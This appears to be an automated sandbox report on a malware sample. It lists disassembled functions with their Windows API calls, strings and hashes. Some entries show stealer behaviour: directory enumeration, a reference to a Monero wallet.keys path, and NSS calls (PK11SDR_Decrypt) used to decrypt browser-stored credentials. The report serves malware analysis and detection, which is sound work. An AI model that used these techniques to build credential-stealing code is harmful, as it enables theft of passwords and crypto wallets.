Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 8adc9944240f5de6c4ec3608e0eca70f613df165534b4f300b034b8d16a22993
Instruction ID: bc1528b1d7638ddf7dd9ba962beb15e088aef05cb1b4483a635ef10dd7c8400c
Opcode Fuzzy Hash: 8adc9944240f5de6c4ec3608e0eca70f613df165534b4f300b034b8d16a22993
Instruction Fuzzy Hash: 29A13371A40258ABDB24DFA4DC89FEE73B8BB45300F044598F60D9A141EB75AB84CF62

Function 6C6BC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C6BC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE472

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 07666fdb95abeea65de448be75d2845b17df2f4a7965e0ad538a7b64aa7667bc
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 5733AC71E0021A8FCB04CFA8C8806EDBBF2FF49314F288269D955BB755D731A956CB94

Function 6C67ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C67EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C67EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C681695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6816B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C681770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C681A3E

Strings

~qel, xrefs: 6C67ED10
~qel, xrefs: 6C67ED13

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~qel$~qel
API String ID: 3693777188-2922831641
Opcode ID: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction ID: 8fa18b222c337912a8b1ca23478ce27298b3960ccb6cabc63e13a2ac82a5fafa
Opcode Fuzzy Hash: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction Fuzzy Hash: 13B33971E01219CFCB24CFA8C890ADDB7B2BF49304F2585A9D459AB745D730AD86CFA4

Function 6C66FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE7B8), ref: 6C66FF81
LeaveCriticalSection.KERNEL32(6C6DE7B8), ref: 6C67022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C670240
EnterCriticalSection.KERNEL32(6C6DE768), ref: 6C67025B
LeaveCriticalSection.KERNEL32(6C6DE768), ref: 6C67027B

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C670D67, 6C670D7B, 6C670DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C66FE99, 6C66FEB7, 6C66FED3, 6C670DB8, 6C670DD3, 6C6719B4
<jemalloc>, xrefs: 6C670D62, 6C670D76, 6C670DA7

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction ID: e8992d00596065b3b005aafba80a9a854203beed125ea67ceae0e362e91cc08c
Opcode Fuzzy Hash: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction Fuzzy Hash: 01C20271A057418FD724CF28C590756BBE1BF85328F28CA6DE4698B7D5C732E801CBA9

Function 000B4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000B4580
RtlAllocateHeap.NTDLL(00000000), ref: 000B4587
wsprintfA.USER32 ref: 000B45A6
FindFirstFileA.KERNEL32(?,?), ref: 000B45BD
StrCmpCA.SHLWAPI(?,000C0FC4), ref: 000B45EB
StrCmpCA.SHLWAPI(?,000C0FC8), ref: 000B4601
FindNextFileA.KERNEL32(000000FF,?), ref: 000B468B
FindClose.KERNEL32(000000FF), ref: 000B46A0
lstrcat.KERNEL32(?,0139F600), ref: 000B46C5
lstrcat.KERNEL32(?,0139E758), ref: 000B46D8
lstrlen.KERNEL32(?), ref: 000B46E5
lstrlen.KERNEL32(?), ref: 000B46F6

Strings

%s\%s, xrefs: 000B461B
%s\*, xrefs: 000B459A

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 08a75daabb7fe5a224230c9d076f203462f47fcc9bf3c323a218ebd1775f9401
Instruction ID: c353aac7866fc759a68a6a2190c0873fe6c1fe3fee7b25882d8e89af604a4102
Opcode Fuzzy Hash: 08a75daabb7fe5a224230c9d076f203462f47fcc9bf3c323a218ebd1775f9401
Instruction Fuzzy Hash: 205157B59402189BCB64EB70DC8DFED777CAB58300F404598F60996151EF74AB85CFA2

Function 000AED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 000AED3E
FindFirstFileA.KERNEL32(?,?), ref: 000AED55
StrCmpCA.SHLWAPI(?,000C1538), ref: 000AEDAB
StrCmpCA.SHLWAPI(?,000C153C), ref: 000AEDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 000AF2AE
FindClose.KERNEL32(000000FF), ref: 000AF2C3

Strings

%s\*.*, xrefs: 000AED32

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 6b190e0739eab1a3476ea8f81175131fd38608043fd5212509fb04bf2454ce64
Instruction ID: 03b943c72a25c2706fe50733899cbad7290024bb8d45071921c3b7bd2117bcb6
Opcode Fuzzy Hash: 6b190e0739eab1a3476ea8f81175131fd38608043fd5212509fb04bf2454ce64
Instruction Fuzzy Hash: C5E1D671A11118AAEB64FB60DC96EEE737CAF55300F4041D9B50A66453EF306F8ACF62

Function 6C67D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D6A6
LeaveCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D712
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C67D82C
<jemalloc>, xrefs: 6C67D827

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction ID: 8e5b2784bc4e44ae93db445447a53da21b8530f242c60e12b6fd494aaa9eed1f
Opcode Fuzzy Hash: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction Fuzzy Hash: 1991C471A047018FD764CF29C49076AB7E1EB89318F158D2EE55AC7B81D734E844CBAA

Function 004710A4 Relevance: 15.4, Strings: 11, Instructions: 1651COMMON

Download Yara Rule

Strings

Pxmq, xrefs: 00472227
!M>_, xrefs: 00471AE0
u5Np, xrefs: 004717DA
Ae, xrefs: 00471A2E
wFs|, xrefs: 004715FC
t@vv, xrefs: 00471C48
xo, xrefs: 00471BB5
Sxmq, xrefs: 00472215
a.}_, xrefs: 00471C2D
nJ~, xrefs: 0047118D
a.}_, xrefs: 00471BA7

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !M>_$Ae$Pxmq$Sxmq$a.}_$a.}_$nJ~$t@vv$u5Np$wFs|$xo
API String ID: 0-1098127137
Opcode ID: 49886ba81e21d1fded986fa6d5e79193840a2af5d5137e6e115732000de514af
Instruction ID: 16d925237431119b362aa2624557565bd780abc61c1dc11db0bcd09c3c643f49
Opcode Fuzzy Hash: 49886ba81e21d1fded986fa6d5e79193840a2af5d5137e6e115732000de514af
Instruction Fuzzy Hash: 82B22AF360C204AFE3046E2DED8567ABBD9EFD4720F1A463DEAC4C3744EA3558058696

Function 000ADE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,000C0C2E), ref: 000ADE5E
StrCmpCA.SHLWAPI(?,000C14C8), ref: 000ADEAE
StrCmpCA.SHLWAPI(?,000C14CC), ref: 000ADEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 000AE3E0
FindClose.KERNEL32(000000FF), ref: 000AE3F2

Strings

\*.*, xrefs: 000ADE26

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: d701bfc76216ff258edcd284d051e4318ce12c0efaaab2fd4b926b8858182f2f
Instruction ID: 3f8cc9c3bf7f545fde58aa0482c5754fbb79fd245af18d7ae2e4c51a82336d22
Opcode Fuzzy Hash: d701bfc76216ff258edcd284d051e4318ce12c0efaaab2fd4b926b8858182f2f
Instruction Fuzzy Hash: 33F1A671914118AADB25FB60DCA5EEE7378BF55300F8041DAB50A66493EF306F49CF62

Function 000AC820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000AC871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000AC87C
PK11_GetInternalKeySlot.NSS3 ref: 000AC88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 000AC8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 000AC8EB
lstrcat.KERNEL32(?,000C0B46), ref: 000AC943
lstrcat.KERNEL32(?,000C0B47), ref: 000AC957
PK11_FreeSlot.NSS3(?), ref: 000AC961
lstrcat.KERNEL32(?,000C0B4E), ref: 000AC978

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
